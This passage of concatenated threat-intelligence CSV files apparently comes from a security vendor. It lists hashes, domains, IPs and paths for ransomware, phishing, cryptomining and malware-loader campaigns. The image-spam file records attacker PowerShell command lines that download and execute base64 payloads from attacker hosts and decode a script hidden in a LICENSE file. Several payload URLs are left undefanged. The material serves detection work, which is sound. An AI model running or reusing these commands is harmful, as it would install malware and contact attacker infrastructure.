sha256,5084694BD772ED8391B2FE294615FA01FA4470F2226F8979096C9AE180DD650A,26557006_614812\019338921.dll 27 | sha256,5F8FC55C8361897AF6650C115495AB798D337A3873137A49D4C986F104DDDEA0,30396299_590251\019338921.dll 28 | sha256,F0D9AAD850C8CB629DB39BBF0C5AE4A00B5E3ACADBFF1FE651B77F23D7A7D4B1,32334184_838865\019338921.dll 29 | sha256,607C59AE954BFD4ED958A71C38D744433FC18B0B804D7915CA000ADB6894282F,45620617_040352\019338921.dll 30 | sha256,5F8FC55C8361897AF6650C115495AB798D337A3873137A49D4C986F104DDDEA0,76380133_398594\019338921.dll 31 | sha256,32359CC1C343A3B967D93F02D2B873F83DB404314D0C40AD624DFC2A1CEE56D7,81309141_826084\019338921.dll 32 | sha256,334C2B32C52E3BC24FF2A28E933FCFFFE1FD671BB688B57ED7E0C5799D5D25D9,82360680_720820\019338921.dll 33 | sha256,269818DF74F0CE9FBEB682D2C8190DF736B4BFC173C1D08D4417C402373C4C02,87543611_161292\019338921.dll 34 | sha256,077CA8645A27C773D9C881AECF54BC409C2F8445AE8E3E90406434C09ACE4BC2,90405769_114456\019338921.dll 35 | -------------------------------------------------------------------------------- /FoolsGoldMetaTraderShaZhuPan.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | domain,all.rcufgmj.cn.w.kunlunea.com,MetaTrader 4 server 3 | url,https://twitter.com/Alicefd1314,Scammer Twitter profile 4 | domain,mebukiltd.com,fake bank site (Mebuki Financial brandjack) 5 | domain,account.mebukiltd.com,fake bank account setup site 6 | domain,mt.mataquotes.com,fake app store for download of app or management profile 7 | domain,mebukifx.com,fake bank site (round 2) 8 | domain,account.mebukifx.com,fake bank site 9 | domain,spreades.com, fake trading site (Spreadex gambling site brandjack) 10 | domain,billionmt4s.com,fake trading site (Billion OS brandjack) 11 | domain,tickml.com,fake trading site (Tickmill brandjack) 12 | domain,exness-eur.net,fake trading site (Exness brandjack) 13 | domain,tosal-fx.com,fake trading site (Tosal brandjack) 14 | 
ip,103.117.101.231,mt.mataquotes.com download site 15 | ip,103.135.248.52,mt.mataquotes.com download site 16 | ip,103.135.250.83,mt.mataquotes.com download site 17 | ip,154.3.37.174,mt.mataquotes.com download site 18 | ip,45.207.26.139,mebukiltd.com fake bank site 19 | ip,219.83.52.46,mebukifx.com fake bank site 20 | ip,47.246.22.112,MetaTrader 4 server 21 | ip,8.25.82.165,MetaTrader 4 server 22 | ip,"8,217.199.160",accounts.Mebukifx.com 23 | domain,app.homebar1.com,domain for enterprise deployment certificate 24 | domain,rowe.ydukgb.cn,app installation server for enterprise MDM deployment 25 | domain, spreades.com, fake trading site 26 | url,https://account.spreades.com/login, fake trading site account capture 27 | ip,216.83.52.46,spreades.com site 28 | url,https://billionmt4s.com/en/,fake trading site Billion LTD 29 | ip, 216.83.53.28, fake Billion LTD trading site 30 | url,https://tickml.com/en/, Fake Tickmill trading site 31 | ip,206.233.131.113, Fake Tickmill trading site 32 | url,https://exness-eur.net/zh-cn/,fake trading site 33 | ip,216.83.52.46, fake Exness site 34 | url,www.tosal-fx.com/en/,fake Tosal trading site 35 | ip,206.233.131.113,fake Tosal trading site 36 | -------------------------------------------------------------------------------- /IOC-sheet_gootloader2025.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to the Gootloader malware family serverside code project,https://news.sophos.com/en-us/2025/01/16/gootloader-inside-out/ ‎ 3 | sha256,03a46ad7873ddb6663377282640d45e38697e0fdc1512692bcaee3cbba1aa016,Malicious HelloDolly.php file 4 | sha256,1fcc418bdd7d2d40e7f70b9d636735ab760e1044bb76f8c2232bd189e2fd8be7,Malicious HelloDolly.php file 5 | sha256,258cb1d60a000e8e0bb6dc751b3dc14152628d9dd96454a3137d124a132a4e69,Malicious HelloDolly.php file 6 | sha256,5d50a7cf15561f35ed54a2e442c3dfdac1d660dc18375f7e4105f50eec443f27,Malicious HelloDolly.php file 7 | 
sha256,7bcffa722687055359c600e7a9abf5d57c9758dccf65b288ba2e6f174b43ac57,Malicious HelloDolly.php file 8 | sha256,af50c735173326b2af2e2d2b4717590e813c67a65ba664104880dc5d6a58a029,Malicious HelloDolly.php file 9 | sha256,89672c08916dd38d9d4b7f5bbf7f39f919adcaebc7f8bb1ed053cb701005499a,Wordpress dump 10 | sha256,0874d307fc45886d2751cd9e6816513dc3e1604e514ef1b291bbe7b1a887cd96,Wordpress dump 11 | ip,5.8.18[.]7, 12 | ip,5.8.18[.]159, 13 | ip,91.215.85[.]52, 14 | domain,my-game[.]biz,"""the mothership""" 15 | url,http[:]//5.8.18.7/filezzz.php, 16 | url,http[:]//5.8.18.7/filesst.php?a=$i&b=$u&c=$r&d=$h&e=$g, 17 | ,, 18 | ,, 19 | ,, 20 | ,, 21 | ,, 22 | ,, 23 | ,, 24 | ,, 25 | ,, 26 | ,, 27 | ,, 28 | ,, 29 | ,, 30 | ,, 31 | ,, 32 | ,, 33 | ,, 34 | ,, 35 | ,, 36 | ,, 37 | ,, 38 | ,, 39 | ,, 40 | ,, 41 | ,, 42 | ,, 43 | ,, 44 | ,, 45 | ,, 46 | ,, 47 | ,, 48 | ,, 49 | ,, 50 | -------------------------------------------------------------------------------- /IOC_imagespam.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note, 2 | Description,https://news.sophos.com/en-us/2023/08/10/image-spam-attack,IOCs from this incident, 3 | domain,aircourier-company[.]com,Conventional website used by the threat actor, 4 | domain,safedelivery-company[.]com,Conventional website used by the threat actor, 5 | domain,exmb25nic6n25sclnf44rrgynquns7u3zjqa33x3uztwbmsuptf7gyid[.]onion,Tor (dark web) website used by the threat actor, 6 | domain,um2kc2ahigbq7t2rchk3tnxnjzvrddbhxkcy573dqxci44wvi4ge5cad[.]onion,Tor (dark web) website used by the threat actor, 7 | domain,fq5rdcppmv7cqjhretm3owbnj4hskcv37bcgx5rpbdbhqfefzix4tiyd[.]onion,Tor (dark web) website used by the threat actor, 8 | domain,xaoqohhckbb3pnxtyqzj6pkuzckt2urbeiyd5xlanmw52expmohl7dyd[.]onion,Tor (dark web) website used by the threat actor, 9 | domain,3emyw4wto7tgupbisnbdbkbyaamb7p7dpxp6lnfqwyemskmmar3fugad[.]onion,Tor (dark web) website used by the threat actor, 10 | 
domain,carpoollk[.]com,Conventional website used by the threat actor, 11 | url,hxxps://carpoollk[.]com/se/maind.ps1,Payload delivery URL, 12 | url,hxxps://aircourier-company[.]com/index/tracking_pack_ch_4254qj6405mo601615yxq41298?next=1,Payload delivery URL, 13 | url,hxxps://safedelivery-company[.]com/manager/tracking_pack_ch_4254qj6405mo601615yxq41298,Payload delivery URL, 14 | filename,sendung_N03012_16092022.com,initial payload name, 15 | filename,SECURE DELIVERY SERVICE.EXE,dropped executable found in %temp%, 16 | sha256,44ccf669eec9f9b9695e0eb255b729df14f63485d85faf5375b5e7efb35a9d3e,ms.ps1 script, 17 | sha256,8ebcc0d9a7883d6526aad38492aa6f2d2192a817591aeb4b971cb2ba3d447ef0,modified LICENSE file with appended base64, 18 | sha256,3ba53f06b81005d0da9dc2e83feb4dd983884ef5533fcec2e8e3772e1ee1a615,Decoded first-level output of LICENSE base64,NOT on VT 19 | sha256,2700054554608a0a1d53fd65067b19d3a1dc0297d6bcfcc4292eec37cde07c18,Decoded second-level output from LICENSE script 1,NOT on VT 20 | sha256,bef6a0755ac4a42697f45843562cc7ce7d1454a85bddc458d2cd99658cf57b71,Decoded second-level output from LICENSE script 2,NOT on VT 21 | sha256,c7c9b1373af60159fe65915116a961be0e74c3719c2f482c91ca88dd738bff78,Decoded second-level output from LICENSE script 3,NOT on VT 22 | sha256,d339ce37d632cee2d457c21b8dbe04fe69930cde0cea13a96593403130abdb54,Installer found on VT that may be the original source, 23 | sha256,782a82e755c16bf653cb3ab5a65bb58638a16cf2b04e1f1cf454b9bced91a81b,another installer found on VT that contains many of the same programs and files as on the target's machine, 24 | sha256,4000f66ed28d407208d0e87875ffa0a55d4079955089e6c2a6d5a057b33841f6,Notepad++ application from program directory,NOT on VT 25 | sha256,5507b8fcfddc3c21f08551a2388fdf4c41fd13531dfed1d6b6d20388440f34db,npp.zip archive found on VT, 26 | sha256,23e87538d4c06ac6c640fe8dbe6992bf652ecdcaa1f0cf9b5e5108d0655fe2c7,PUA: Windows Socat tool found on target's computer; Reference: 
https://www.redhat.com/sysadmin/getting-started-socat, 27 | sha256,301b2b0c6eef71a33312207abf6c4b7f0fd703a988529a9cd457a412eb9f9992,Comodo EV CA certificate file installed by PowerShell script into Firefox CA storage, 28 | ssl_certificate_serial,00f45b2f89e952dab0,serial number for COMODO RSA EV cert, 29 | command_line,GUP.exe -dexmb25nic6n25sclnf44rrgynquns7u3zjqa33x3uztwbmsuptf7gyid[.]onion -s18912,invoked by Schedulted Task, 30 | domain_port,exmb25nic6n25sclnf44rrgynquns7u3zjqa33x3uztwbmsuptf7gyid[.]onion:18912,[.]onion site and port used for outbound communication, 31 | domain_port,um2kc2ahigbq7t2rchk3tnxnjzvrddbhxkcy573dqxci44wvi4ge5cad[.]onion:18912,[.]onion site and port used for outbound communication, 32 | domain_port,fq5rdcppmv7cqjhretm3owbnj4hskcv37bcgx5rpbdbhqfefzix4tiyd[.]onion:18912,[.]onion site and port used for outbound communication, 33 | domain_port,xaoqohhckbb3pnxtyqzj6pkuzckt2urbeiyd5xlanmw52expmohl7dyd[.]onion:18912,[.]onion site and port used for outbound communication, 34 | domain_port,3emyw4wto7tgupbisnbdbkbyaamb7p7dpxp6lnfqwyemskmmar3fugad[.]onion:18912,[.]onion site and port used for outbound communication, 35 | command_line,powershell.exe /c $p=Start-Process -FilePath $env:LOCALAPPDATA\Notepad++\notepad++.exe -PassThru; Write-Host Notepad PID is $($p.Id),Command to identify the PID of the Notepad++ process, 36 | command_line,powershell.exe -c IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString((Get-Content 'C:\\Users\\daniela.minnig\\AppData\\Local\\Notepad++\\updater\\LICENSE' | Out-String | % { $_[7804 ..($_.Length-1)] }))))),Command to decode the LICENSE text file and execute the payloads, 37 | scheduled_task_path,GUPP.exe -tplugins -s18912,"Command executed by a scheduled task named ""Update Plugins Notepad++""", 38 | command_line,Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object 
Net.WebClient).DownloadString('httpx://script.google.com/macros/s/AKfycby-cKMXZxHp3swavFP4kmj_yGdBNbBN1kw-ygkn0KJuctbU_2aDkgMGzb2xLAchiJt2/exec?se=1&ip='+(New-Object System.Net.WebClient).DownloadString('httpx://api.ipify.org/'))))),Command to download and decode base64 from a now-unavailable Google cloud location and to obtain the public facing IP address from IPify service, 39 | command_line,powershell.exe -nop -c Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://carpoollk[.]com/se/maind.ps1')))),Command to retrieve a PowerShell script from a domain the attacker controls, 40 | sha256,4000f66ed28d407208d0e87875ffa0a55d4079955089e6c2a6d5a057b33841f6,executable signed by Cloud Accountants Limited,Notepad++.exe 41 | sha256,abd20c3cc7a02fce3a39cf03225f321d8c92db4a96b54d87dcac7ddc112c7c00,executable signed by Cloud Accountants Limited,GUP.exe 42 | sha256,fcc9600aaa6b398b861962bb5ef8cd88072be3c619c235e890909e4f12374005,executable signed by Cloud Accountants Limited,GUPP.exe 43 | sha256,23e87538d4c06ac6c640fe8dbe6992bf652ecdcaa1f0cf9b5e5108d0655fe2c7,executable signed by BULDOK LIMITED,socat.exe 44 | sha256,d8ac4f43a5279e3aa33b2a743e17e1c59ba170c74965c45feca529fd8e817140,Installer found on VT closely related to the original source,Australia incident 45 | -------------------------------------------------------------------------------- /IOC_quishing2024.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Phishing domains employed in quishing attacks targeting Sophos and other organizations,https://news.sophos.com/en-us/2024/10/16/attackers-leverage-qr-codes-in-pdf-email-attachments-for-phishing-on-mobile-devices/ 3 | domain,login.banowash.com, 4 | domain,banowash.com, 5 | domain,login.khoshnaamcc.com, 6 | domain,khoshnaamcc.com, 7 | domain,erispub.it, 8 | domain,driv.sharedfiledrive.com, 9 | 
domain,sharedfiledrive.com, 10 | domain,uAa.iancendit.com, 11 | domain,iancendit.com, 12 | domain,pub-4d4edb0d119c468c81820c36344b6d98.r2.dev, 13 | domain,lbts.doclawconsultant.com, 14 | url,hxxps://login.banowash.com/#[email], 15 | url,hxxps://login.khoshnaamcc.com/#[email], 16 | url,hxxps://erispub.it/wp-admin/user/reset/?mail=[email], 17 | url,hxxps://driv.sharedfiledrive.com/[email], 18 | url,hxxps://uAa.iancendit.com/9uCUGa/[email], 19 | url,hxxps://de-xinsports.com/gstqiwyva.html, 20 | url,hxxps://pub-4d4edb0d119c468c81820c36344b6d98.r2.dev/hayehsoowpg, 21 | url,hxxps://lbts.doclawconsultant.com/Bj12z/?e=, 22 | ,, 23 | ,, 24 | ,, 25 | ,, 26 | ,, 27 | ,, 28 | ,, 29 | ,, 30 | ,, 31 | ,, 32 | ,, 33 | ,, 34 | ,, 35 | ,, 36 | ,, 37 | ,, 38 | ,, 39 | ,, 40 | ,, 41 | ,, 42 | ,, 43 | ,, 44 | ,, 45 | ,, 46 | ,, 47 | ,, 48 | ,, 49 | -------------------------------------------------------------------------------- /Karma_Conti_joint_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | sha256,e6212e7d74f315fa4638e32ab775fb1b57ef55071d179676330bbad4dc102a57,Conti ransomware 3 | sha256,74c8f583cac135fc005ef0141142c9fedf6fd3c1791545a176db8b4deab7b11d, 4 | sha256,11a27e5803ad997d2e6eebe1decb945d4a42974f506a56654c3653eec5b401e2, 5 | sha256,ef8b55e1ad80bd503df7d880bfa6ffb26288a782c250267b85766490c33b6f4b,Troj/PSDrop-FE Cobalt Strike dropper 6 | sha256,e066cc48c1b45aee43e394636c6c12502cf7deed6599f60fba140c4c57501e95,Troj/PSInj-BF Cobalt 7 | sha256,41324493142b10db127217274e21df37f6ccd13f01a8d29d2b23b7b1463423a7,Conti ransomware 8 | filename,64.dll,Conti ransomware 9 | filename,Get-DataInfo.ps1, 10 | IP,"5.149.249.187 11 | ",Cobalt Strike server 12 | IP,185.70.184.8,Cobalt Strike server 13 | IP,104.168.44.130,Cobalt Strike server 14 | IP,74.222.5.43,ProxyShell attack host 15 | IP,84.17.46.148,Attack host 16 | IP,185.217.117.44,ProxyShell attack host 17 | IP,104.197.217.121,download script host 18 | 
IP,45.155.204.227,Script host for attack tools 19 | IP,213.232.127.66,Script host for attack tools 20 | IP,203.184.132.187,Script host for attack tools 21 | IP,193.29.13.203,CobaltStrike C2 22 | domain,smartdata.su,Script host for attack tools 23 | domain,novinhost.org,Script host for attack tools 24 | domain,hgc.com.hk ,Script host for attack tools 25 | domain,perfectip.net,ProxyShell attack host 26 | domain,datacamp.co.uk,Attack host -------------------------------------------------------------------------------- /MAILBOMB-TEAMS-RANSOMWARE.csv: -------------------------------------------------------------------------------- 1 | indicator,Data,Notes 2 | description,Indicators for STAC5777 (AKA Storm-1811),https://news.sophos.com/en-us/2025/01/21/sophos-mdr-tracks-two-ransomware-campaigns-using-email-bombing-microsoft-teams-vishing/ 3 | file_path_name,C:\Users\\Downloads\nethost.dll,STAC5143 malicious DLL sideloaded by ProtonVPN executable. 4 | file_path_name,C:\Users\\Downloads\kb641812-filter-pack-2024-1.dat ,STAC5777 payload delivery file 5 | file_path_name,C:\Users\\Downloads\kb641812-filter-pack-2024-2.dat ,STAC5777 payload delivery file 6 | file_path_name,C:\Users\\Downloads\pack.zip ,STAC5777 combined payload archive 7 | file_path_name,C:\Users\\AppData\Local\OneDriveUpdate\upd2836a.bkt ,STAC5777 second-stage archive 8 | file_path_name,C:\Users\\AppData\Local\OneDriveUpdate\OneDriveStandaloneUpdater.exe ,STAC5777 Abused legitimate Microsoft OneDrive Standalone Updater executable 9 | file_path_name,C:\Users\\AppData\Local\OneDriveUpdate\settingsbackup.dat ,STAC5777 encrypted malware payload 10 | file_path_name,C:\Users\\AppData\Local\OneDriveUpdate\winhttp.dll ,STAC5777 sideloaded malicious DLL 11 | ip_port,74.178.90[.]36:443 ,STAC5777 Command and Control 12 | ip_port,195.123.241[.]24:443 ,STAC5777 Command and Control 13 | ip_port,207.90.238[.]46:443 ,STAC5777 Command and Control 14 | account,helpdesk@llladminhlpll.onmicrosoft.com ,STAC5777 abused M365 
account 15 | ip,78.46.67[.]201 ,STAC5777 adversary Teams client IP 16 | sha256,f009ec775b2daa5a0f38dc2593a3c231611bea7cb579363915d9be1135b00455,STAC5143 C2 malware nethost.dll 17 | sha256,3d0e55bd3c84e6cb35559ef1d0f2ef72a21e0f3793a9158d514f12f46b0aff85 ,STAC5777 kb641812-filter-pack-2024-2.dat 18 | sha256,801525d7239e46f9c22d7e7bcd163abcfb29fc0770ff417f5fc62bfb005ec7ac ,STAC5777 settingsbackup.dat 19 | sha256,ea2b3bf32cc27e959e19c365fa2f6e5310ef2e76d3d0ed2df3fb5945f9afc9e7 ,STAC5777 winhttp.dll C2 backdoor 20 | sha256,4b6a008c8b85803dc19a8286f33cad963425d37c4ca0b1a9454a854db3273dad ,STAC5777 winhttp.dll C2 backdoor 21 | sha256,a23560a3b9a9578dcd70bcd01434b2053940d6be36e543df8e4d36931ca9ea63 ,STAC5777 winhttp.dll C2 backdoor 22 | registry_path_key,HKEY_LOCAL_MACHINE\SOFTWARE\TitanPlus\,STAC5777 Command and Control registry key for IP addresses 23 | file_path_name,C:\ProgramData\winter.zip ,STAC5143 post-compromise exploitation tools payload 24 | sha256,4b33c3e3b4b26df0e8efd58e88594a7ee2bd98899451b63d1140eabbca2180a171dc88874b9dcae1f43e312d9e556826b60c1fb,STAC5143 post-compromise exploitation tools payload 25 | file_path_name,C:\ProgramData\winter\166_65.py,STAC5143 obfuscated RPivot tool component 26 | sha256,42d09288a78363cac90759ddce814a420f22d174768c1e406bf2d8fed2c38ade,STAC5143 obfuscated RPivot tool component 27 | file_path_name,C:\ProgramData\winter\37_44.py,STAC5143 obfuscated RPivot tool component 28 | sha256,8abc8c92ebfe78f54e7488a467d1b6e90d28382067b49a954e31133691112eba,STAC5143 obfuscated RPivot tool component 29 | file_path_name,C:\ProgramData\winter\45_237_80.py,STAC5143 obfuscated RPivot tool 30 | sha256,697d5213d69cdfbd943c6d395f907b8fe210bbfc9d78a9d41a046ba55bebb5ff, 31 | ip,207.90.238.99,STAC5143 C2 connection 32 | ip,109.107.170.2,STAC5143 C2 connection 33 | ip,195.133.1.117,STAC5143 C2 connection 34 | ip,206.206.123.75,STAC5143 C2 connection 35 | ip,194.87.39.183,STAC5143 download source 36 | file_path_name,C:\ProgramData\winter\debug.exe,renamed 
Python interpreter 37 | file_path_name,C:\Users\Public\Documents\MailQueue-Handler\jdk-23.0.1\bin\javaw.exe ,dropped Java runtime (legitimate) 38 | file_path_name,C:\Users\Public\Documents\MailQueue-Handler\MailQueue-Handler.jar,STAC5143 First-stage JAR dropped by attacker 39 | file_path_name,C:\Users\Public\Documents\MailQueue-Handler\identity.jar ,STAC5143 Second-stage JAR malware 40 | -------------------------------------------------------------------------------- /Mal-BadNode.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | sha256,30ee628504faea18dc99602971aafbc05a0b05dc964797edf49633f67cd178e2,"NPM UA-Parser package, containing legitimate UAParser.js 0.7.28 and three malicious payload files" 3 | sha256,e6cba23d350cb1f049266ddf10f872216f193c5279017408b869539df2e73c83,"Malicioius JS install script, detected as JS/BadNode-A" 4 | sha256,f4c800066e56dd32d20299c451fe6a2b60a3563f7f1915f8ca8db9916d810b5c,Malicious .BAT file (BAT/BadNode-A) 5 | sha256,21e68b048024ba0cc5a2a94ecbc3a78c626ec7d5d705829a82ea4715131d0509,Malicious Linux shellscript (SH/BadNode-A) 6 | sha256,7f986cd3c946f274cdec73f80b84855a77bc2a3c765d68897fbc42835629a5d5,XMRig Miner (PUA) for Windows 7 | sha256,2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd,Malicious DLL carrying DanaBot (Mal/EncPk-AQC) 8 | sha256,ea131cc5ccf6aa6544d6cb29cdb78130feed061d2097c6903215be1499464c2e,Linux XMRig Miner 9 | sha256,bb8ccdcf17761f1e86d8ebbc1a12b123929c48c5eea4739b7619bd53728d412b,New version of malicious DLL packer 10 | filename,preinstall.js,"Malicioius JS install script, detected as JS/BadNode-A" 11 | filename,preinstall.bat,Malicious .BAT file (BAT/BadNode-A) 12 | filename,preinstall.sh,Malicious Linux shellscript (SH/BadNode-A) 13 | filename,create.dll,Copy of sdd.dll packer 14 | url, https://citationsherbe.at/sdd.dll,Malicious DLL download URL 15 | url,http://159.148.186.228/download/jsextension,Linux XMRig Miner download URL 
16 | url,http://159.148.186.228/download/jsextension.exe,Windows XMRig Miner download URL 17 | ip,194.76.225.46,C2 for Mal/EncPk-AQC 18 | ip,185.158.250.216:443,C2 for credential stealing malware 19 | ip,45.11.180.153:443,C2 for credential stealing malware 20 | ip,194.76.225.61:443,C2 for credential stealing malware 21 | -------------------------------------------------------------------------------- /Mal-EncPk-APV_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Indicators from https://news.sophos.com/en-us/2021/06/17/vigilante-antipiracy-malware/, 3 | sha256,c2d123f21ac2fe15d8fa52160d585e5e8a462131cfcb5d4843d5a57c0bdd9877,Adobe Acrobat Pro DC v2020.009.20067 4 | sha256,f038e5112800e85863cde581916f245365ee9f50e2541f6eaebf0c5364ddf941,Adobe Photoshop 2020 v21.1.3.190 (x64x86) Pre-Activated 5 | sha256,3c4461c25826a3e28d6e5512df7936e0233636a2c223a36165f4a557936997ff,Aiseesoft PDF Converter Ultimate - 3 3 26 incl Patch 6 | sha256,562fc59ccebffe1d3cacb3d1595de19daf9c491797ef68a54259bf7adc0495f3,Among Us v2020.9.24s 7 | sha256,ed030a7868a7221d00ab66ba395b6a699718c52c8c752fe3e7b9f21ae4a8ba85,Command and Conquer Remastered Collection - PLAZA 8 | sha256,053bbe330a53d1185a1c94f062f67cac4a317d78909c026be31d413fe28a087b,Left 4 Dead 2 (v2.2.0.1 Last Stand + DLCs + MULTi19) 9 | sha256,02490797444bd8dfe45e3e604b168241ee099ec5e8906af863e5ed43b054cd9a,Malwarebytes - Anti-Malware Premium 3.6.1.2711 - Pre-Activated 10 | sha256,ed030a7868a7221d00ab66ba395b6a699718c52c8c752fe3e7b9f21ae4a8ba85,Nuance Dragon Professional Individual v15.60.200 Fix 11 | sha256,91f52611bac57f78ac5274bc43237861b0cf2e3f8550f9a1de7f5cbef1d3b83f,PassFab Android Unlocker v2.1.1.3 12 | sha256,bd641f525bb195b8dccacd8c218ec98dfff82801cf4eee5320669d8c84e11c4e,StartIsBack ++ v2.9.5 13 | sha256,f8beb912038cbd43d151cedcd4c0e6d3ec463b64b30941da68419af868d267bb,Minecraft 1.12.2 Cracked [Full Installer] [Online] [Server List] 14 | 
sha256,84F38AE6C2C3971DAB7ECE54E8F895F607A2F264A76691C52C521CD418A569C4,Microsoft Visual Studio Enterprise 2019 v16.0.4Final 15 | sha256,fb66cfcbca8b3b2bba43affed0d34cb0bd4df4e44278be2f4c1690003dbc2e2c ,ProcessHacker.jpg payload 16 | domain,1flchier.com, 17 | path,/blink.php?name=, 18 | -------------------------------------------------------------------------------- /Malware-SystemBC.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs for SystemBC ,https://news.sophos.com/en-us/2020/12/16/systembc/ ‎ 3 | sha256,064ad27c86558462669c51b6277913bba035630d7b45b7db69c15c0186e42b10,HPMal/SysBRat-A sample 1 4 | sha256,c9349c7bd9ef87a593d28158a2219935cc43cea12b8a7d7971489cb0b7654e7e,HPMal/SysBRat-A sample 2 5 | sha256,f7fc24cba9247641f1608cf897c7d1f1b0adea32e724c8a3e79c3a40b235c315,HPMal/SysBRat-A sample 3 6 | sha1,944233262bb95bbb7456314e14c56fb36200e09,HPMal/SysBRat-A sample 4 7 | sha256,90334ecb93afa6abb9d5739738b4b03437b0ee1829253bb3c4b966a1bf9f3882,HPMal/SysBRat-A sample 5 8 | domain,advertrex20.xyz,HPMal/SysBRat-A sample 1 9 | domain,gentexman37.xyz,HPMal/SysBRat-A sample 1 10 | domain,advertsp74.xyz,HPMal/SysBRat-A sample 2 11 | domain,shopweb95.xyz,HPMal/SysBRat-A sample 2 12 | domain,mexstat128.com,HPMal/SysBRat-A sample 3 13 | domain,sdadvert197.com,HPMal/SysBRat-A sample 3 14 | domain,decatos30.com,HPMal/SysBRat-A sample 4 15 | domain,decatos30.xyz,HPMal/SysBRat-A sample 4 16 | domain,asdasd08.com,HPMal/SysBRat-A sample 5 17 | domain,asdasd08.xyz,HPMal/SysBRat-A sample 5 18 | registry_path_key,HKLM\SYSTEM\ControlSet001\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{B5DA8633-954C-4495-AE46-0BB5B5FB1CDC}\Connection\PnpInstanceID, -------------------------------------------------------------------------------- /Miner-Mrbminer.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Indicators of 
MrbMiner cryptojacking software,https://news.sophos.com/en-us/2021/01/21/mrbminer-cryptojacking-to-bypass-international-sanctions/ 3 | domain,vihansoft.ir,C2 and payload domain 4 | domain,mrbfile.xyz,payload domain 5 | domain,mrbftp.xyz,payload domain 6 | domain,mrbpool.xyz,Cryptocurrency destination domain 7 | domain,poolmrb.xyz,Cryptocurrency destination domain 8 | domain_port,vihansoft.ir:3341, 9 | ip,145.239.225.15, 10 | ip,54.36.10.77, 11 | sha256,1fdbd98e98ef5d6486b48542047d9c7d10421404692eded90ec892d39df35e78,assm.exe downloader 12 | sha1,06052037bf8505bbc0f9dbbeb5ded23c742c21dc,hostx.dll 13 | sha1,1149d9360a80a1723cac36a34c5e61af6ec0a1f4,linuxservice.tar.gz 14 | sha1,16c2fc6cea484b8eef3dc984992d1f2d4a328300,win.dll 15 | sha1,171d361344d8fe86b4cda379f4f56175efb30561,linuxservice.tar.gz 16 | sha1,213956d187ba1bf429362bd60ace89ea39fc78d4,xmr.tar.gz (xmrig miner) 17 | sha1,2238a2ca85e2017b16361317f68d8ee8566dd3eb,vhost.tar.gz 18 | sha1,26ebb2593878fd667b73ee92bd49ca0db735b652,linux-os.tar.gz 19 | sha1,2e0735bc403b2df432b6f8de649625d9d0c18340,sys.dll 20 | sha1,2e0735bc403b2df432b6f8de649625d9d0c18340,sys2.dll 21 | sha1,324f678744e2d0eaa305a6efc6b7121e7730f5d5,Hostx.zip 22 | sha1,324f678744e2d0eaa305a6efc6b7121e7730f5d5,hostx2.dll 23 | sha1,32988daeb08736a9a3982eacddfbd7efb447f678,agentz.zip 24 | sha1,366892fb08a0bd15248a256bc28d3deae1deb317,sys.dll 25 | sha1,366892fb08a0bd15248a256bc28d3deae1deb317,sys2.dll 26 | sha1,37c72bfd7fac968f31ed3f7b0db4b395249d72d6,hostx2.zip 27 | sha1,3b814debba2f063c24e76e49d18e43e5f3ef012a,d.zip 28 | sha1,431159bea4ee95ea35bdcd9a9413dd3079d447f8,hostz.zip 29 | sha1,4fbdaddec288b6af10621ef527d89dc82db88fa4,sys3.dll 30 | sha1,53f63e6b0e41b1ebcb43feeed23aa4fc7b4fa827,assm.ex 31 | sha1,65bf885571ec5d934d7e1fcdeee121ce02c20cb2,agentx.zip 32 | sha1,68b0b699fe55a5d802745298b366403a08249bf6,syslib.dll 33 | sha1,7369c59499db291759b20b10eda2502408ad4ede,armv.tar.gz (xmrig miner) 34 | sha1,80ed476aba352c37c7d75b94721b471e17667a18,arm.tar.gz 35 
| sha1,925ad7bea193d4a19d053c41a9ab12f2996cd2a9,p.zip 36 | sha1,976950d86215709cb6fe33dbe7497ddc7e0684a0,InstallService2.ex 37 | sha1,9976681f4c77fdf3566e8ad20dbc4cc5e8a332cb,sys.dll 38 | sha1,?976950d86215709cb6fe33dbe7497ddc7e0684a0,k.ex 39 | sha1,?b97c739713ae05a6823974c972d7b49e2b5cab48,pack.zip 40 | sha1,a21c84c6bf2e21d69fa06daaf19b4cc34b589347,kprocesshacker.sys 41 | sha1,a94d9db3046ec3c9a9278ea5f1f4d93afb043b41,agentx.dll 42 | sha1,aa143648ec22bf05762fc96f5acbf4fe5d6d5dc6,SqlServer.dll 43 | sha1,aa3b9ff3a458c7b9e13eac11e1d172ccf5ec9492,host.zip 44 | sha1,aa56debae96df8ad4a3287db3e4c20b0bf6ea073,osx.tar.gz 45 | sha1,b241e489452568d15cb4672f2108a63dfda75201,sys2.dll 46 | sha1,c246db1ae246e16b1afa95e6c90fefaf0c1d0592,Agent.zip 47 | sha1,f0972e86d8fbbca91f409de4bfe8efc3208b7a42,sys.dll 48 | sha1,f0972e86d8fbbca91f409de4bfe8efc3208b7a42,sys.zip 49 | sha1,f634dd1f9f8ad37eb03f303a2645886acad6ed0e,InstallService.ex 50 | url,http://145.239.225.15/linuxservice.tar.gz, 51 | url,http://145.239.225.15/vhost.tar.gz, 52 | url,http://145.239.225.15/xmr.tar.gz, 53 | url,http://54.36.10.77/35/sys.dll, 54 | url,http://54.36.10.77/sys.dll, 55 | url,http://mrbfile.xyz/35/, 56 | url,http://mrbfile.xyz/35/sys.dll, 57 | url,http://mrbfile.xyz/Agenty.zip, 58 | url,http://mrbfile.xyz/Agentz.zip, 59 | url,http://mrbfile.xyz/Hosty.zip, 60 | url,http://mrbfile.xyz/Hostz.zip, 61 | 